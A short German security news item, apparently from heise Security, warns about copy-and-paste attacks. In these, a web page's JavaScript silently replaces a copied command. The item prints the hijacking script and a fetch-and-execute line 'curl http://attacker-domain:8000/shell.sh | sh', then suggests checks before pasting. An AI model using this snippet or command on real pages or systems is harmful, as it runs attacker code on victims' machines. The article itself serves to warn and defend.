l+f: Copy-and-paste im Trojaner-Gewand
Manchmal bekommt man etwas gänzlich anderes, als man denkt. Das kann durchaus gefährlich werden.
(Bild: Skorzewiak/Shutterstock.com)
Nicht nur Entwickler kopieren Befehle via Copy-and-paste von Websites, wenn sie an Projekten arbeiten. Auch etwa Linux-Neulinge fügen Befehle, um beispielsweise Ubuntu auf den aktuellen Stand zu bringen, ins Terminal ein. Das könnte unter bestimmten Voraussetzungen ein Einfallstor für Angreifer sein und Schadcode auf Computer lassen.
More than meets the eye
Davor warnt ein Sicherheitsforscher von Wizer in einem Beitrag. Damit ist er aber nicht der Erste, der so ein Angriffsszenario skizziert. In seinem Beispiel denken Nutzer, dass nach dem Kopieren der Befehl sudo apt update in der Zwischenablage und nach dem Einfügen im Terminal auftaucht. Das ist aber nicht der Fall.
Ein JavaScript sorgt mit einem "event listener" dafür, dass stattdessen der Befehl curl http://attacker-domain:8000/shell.sh | sh im Terminal landet und direkt ausgeführt wird.
<script>document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://attacker-domain:8000/shell.sh | sh\n'); e.preventDefault(); }); </script>
Auf diesem Weg könnte Angreifer Opfer hinters Licht führen, vermeintlich legitime Befehle ins Terminal zu kopieren. In Wirklichkeit startet aber von einer vom Angreifer kontrollierten Website ein Skript mit Schadcode. Geschieht dies in Verbindung mit sudo und dementsprechend Root-Rechten, kann das schwerwiegende Folgen für das System haben.
Um diese Sicherheitsproblematik vorzubeugen, könnte man kopierte Befehle vorher in ein Textdokument einfügen, um zu prüfen, was wirklich ankommt. Alternativ kann man im Terminal den Befehl vor dem Einfügen mit # zu einem Kommentar machen und die direkte Ausführung auf diesem Weg verhindern.
lost+found
Die heise-Security-Rubrik für Kurzes und Skurriles aus der IT-Security.
Alle l+f Meldungen in der Übersicht
(des)
